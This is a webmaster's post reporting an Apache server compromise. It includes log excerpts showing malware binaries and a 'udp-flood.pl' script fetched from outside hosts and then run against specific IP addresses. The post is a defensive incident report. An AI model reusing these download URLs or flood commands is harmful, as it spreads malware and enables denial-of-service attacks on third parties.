Ever since we found and stopped a phishing site that had been planted on our server to run as the default site under Apache, we have been under constant attack. Presumably, the perpretrators did not appreciate that we made their millions of scam emails ineffective. So, today I just happen to get a feeling that I should check for rootkits. Sure enough, someone had a listener at port 3049 and lsof showed the owner as being Apache. More investigation shows the following in /tmp -rwxrwxrwx 1 apache apache 34314 Jun 21 08:33 bash- -rwxrwxrwx 1 apache apache 34346 May 3 17:30 httpp -rw-r--r-- 1 apache apache 1089 Jun 20 16:05 udp-flood.pl -rw-r--r-- 1 apache apache 1089 Jun 20 16:05 udp-flood.pl.1 And the following in the Apache error_log: Syntax error on line 1194 of /etc/httpd/conf/httpd.conf: ServerName takes one argument, The hostname and port of the server % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 34346 100 34346 0 0 91094 0 --:--:-- --:--:-- --:--:-- 258k % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 34346 100 34346 0 0 143k 0 --:--:-- --:--:-- --:--:-- 348k sh: Aarhus: command not found --07:49:08-- http://members.cox.net/linuxg0d/bash- => `bash-' Resolving members.cox.net... 68.1.17.8 HTTP request sent, awaiting response... 200 OK 0K .......... .......... .......... ... 100% 334.35 KB/s % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 3 34314 3 1197 0 0 7737 0 0:00:04 --:--:-- 0:00:04 7737 curl: (23) Failed writing body bash-: no process killed httpp: no process killed % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 34314 100 34314 0 0 100k 0 --:--:-- --:--:-- --:--:-- 323k sh: uname -a: command not found sh: uname -a: command not found --14:47:00-- http://members.cox.net/linuxg0d/bash- => `bash-.1' Resolving members.cox.net... 68.1.17.8 HTTP request sent, awaiting response... 200 OK 0K .......... .......... .......... ... 100% 311.24 KB/s % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 34314 100 34314 0 0 97k 0 --:--:-- --:--:-- --:--:-- 367k --22:14:11-- http://coretecsystems.com:4660/udp-flood.pl => `udp-flood.pl' Resolving coretecsystems.com... 68.5.101.205 HTTP request sent, awaiting response... 200 OK 0K . 100% 10.39 MB/s sh: line 1: 12015 Terminated perl udp-flood.pl 193.15.190.221 0 0 And then some hours later: --10:16:10-- http://members.cox.net/linuxg0d/httpp => `httpp' Resolving members.cox.net... 68.1.17.8 Connecting to members.cox.net[68.1.17.8]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 34,346 [text/plain] 0K .......... .......... .......... ... 100% 290.01 KB/s 10:16:10 (290.01 KB/s) - `httpp' saved [34,346/34,346] --19:31:24-- http://coretecsystems.com:4660/udp-flood.pl => `udp-flood.pl.1' Resolving coretecsystems.com... 68.5.101.205 Connecting to coretecsystems.com[68.5.101.205]:4660... connected. HTTP request sent, awaiting response... 200 OK Length: 1,089 [text/plain] 0K . 100% 10.39 MB/s 19:31:24 (10.39 MB/s) - `udp-flood.pl.1' saved [1,089/1,089] sh: line 1: 19530 Terminated perl udp-flood.pl 130.243.43.30 0 0 ---------------------------------------------------------------------------- It all appears to reveal that the perps were able to run some kind of upload program, although I am not familiar with the output. And, they are able to get Apache to execute the upload as if it were CGI. Oh yeah, and when the perl script, upd-flood.pl fires off, you might as well just power-down the box! Todd Merriman webmaster@xxxxxxxxxxxxxx